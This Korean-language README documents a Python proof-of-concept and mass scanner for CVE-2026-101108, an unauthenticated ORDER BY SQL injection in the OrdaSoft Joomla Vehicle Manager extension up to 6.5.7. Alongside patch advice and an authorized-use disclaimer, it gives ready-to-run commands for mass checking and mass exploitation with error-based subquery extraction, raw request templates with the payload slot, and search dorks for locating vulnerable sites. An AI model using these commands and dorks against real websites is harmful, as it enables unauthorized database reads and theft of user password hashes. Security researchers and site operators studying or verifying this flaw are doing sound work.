
CVE-2026-101108에 대한 Python 3 PoC 및 대량 스캐너로, OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager)의 인증되지 않은 ORDER BY SQL 인젝션입니다.
CVE-2026-101108 — OrdaSoft Vehicle Manager (Free) Joomla 확장 ≤ 6.5.7에 대한 Python 3 PoC. **6.5.8+**에서 수정됨.
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Catalog | https://pocbit.org/pocs/ |
| Component | com_vehiclemanager |
| File | site/vehiclemanager.php |
| Parameters | order_field, order_direction → ORDER BY (따옴표 없음) |
| Auth | 없음 (공개 카테고리 / 검색 / 전체 차량 보기) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
**Vehicle Manager (Free)**는 Joomla에서 차량 매물(카테고리, 검색, 전체 차량)을 제공하는 OrdaSoft 확장입니다. 6.5.7 및 이전 버전에서 **order_field**와 order_direction 정렬 파라미터는 site/vehiclemanager.php 내에서 처리됩니다: 입력에 **이스케이프(escaping)**가 적용되지만, 값이 따옴표 없는 ORDER BY 표현식에 들어가기 때문에 이스케이프가 SQLi에 대해 무력해집니다 (CNA 설명).
공격자는 인증 없이 데이터베이스 읽기/쓰기, Joomla 사용자 해시 및 사이트 무결성 측면에서 심각한 위험을 초래합니다. 6.5.8 이상으로 업그레이드하십시오.
일반적인 Joomla/PHP 코드는 사용자 입력을 문자열 리터럴에 대한 따옴표를 이스케이프하는 "새니타이저"를 통해 실행할 수 있습니다. ORDER BY에서 컬럼 이름과 표현식은 문자열 리터럴이 아닙니다 — 정렬 키는 SQL 구조로 연결됩니다. 공격자는 실제 컬럼 이름 대신 오류 기반 서브쿼리와 같은 표현식을 제공합니다. CVE-2026-101108에 대한 CNA 텍스트는 이 이스케이프 우회 패턴을 명시적으로 문서화합니다.
영향을 받는 익명 프론트엔드 진입점:
showCategory)search / 관련 작업)showVehicles 및 유사 항목)| 모드 | 동작 |
|---|---|
| check | 컴포넌트 + 매니페스트 버전 핑거프린팅, catid/Itemid 탐색, SQLi 확인 |
| exploit | ORDER BY를 통한 오류 기반 EXTRACTVALUE 스타일 이중 쿼리 |
| mass | --list + -j로 대량 확인 또는 대량 추출 |
시도되는 인젝션 벡터 (exploit에서 첫 성공이 승리):
order_field GETorder_direction GET (asc,<subquery>)order_field POSTorder_direction POSTJSONL 필드: pocbit, pocbit_catalog, pocbit_page, cve, component.
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| 플래그 | 의미 |
|---|---|
--aggressive | check 모드에서도 SELECT VERSION() 유출 시도 |
--subquery | 오류 기반 페이로드용 내부 SELECT (MySQL) |
--vector | 네 가지 ORDER BY 벡터 중 하나를 강제 |
--exploited-list | 성공적인 exploit 시 탭으로 구분된 유출 정보 |
--no-color | 일반 CLI (NO_COLOR 존중) |
종료 코드: exploit 모드는 exploited: true일 때 0; check 모드는 exploitable_candidate일 때 0.
카테고리 라우트 (PoC가 정렬 파라미터를 추가):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
PoC가 구성한 검색 라우트 기준선:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
읽을 수 있는 경우:
/administrator/components/com_vehiclemanager/vehiclemanager.xml버전 ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
호스트를 targets.txt로 내보내고 (한 줄에 하나의 기본 URL), 승인된 자산에 대해서만 check → hits → exploit을 수행하십시오.
Real Estate Manager CVE (예: CVE-2026-100752 / CVE-2026-100753)와 동일한 공개 기간: 여러 OrdaSoft Joomla 확장이 SQLi/XSS 수정을 받았습니다. Vehicle Manager를 운영 중이라면 배포한 모든 OrdaSoft 컴포넌트를 패치하십시오.
| CVE | 제품 | 문제 | 수정 버전 |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | 인증 없는 ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | 인증 없는 ORDER BY SQLi | 6.7.9 |
크레딧 (CNA): Ala Arfaoui.
com_vehiclemanager SQLi (이전 버전, 검색 파라미터) — 별개이지만 관련된 컴포넌트 표면승인된 보안 테스트 및 패치 검증 전용.
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108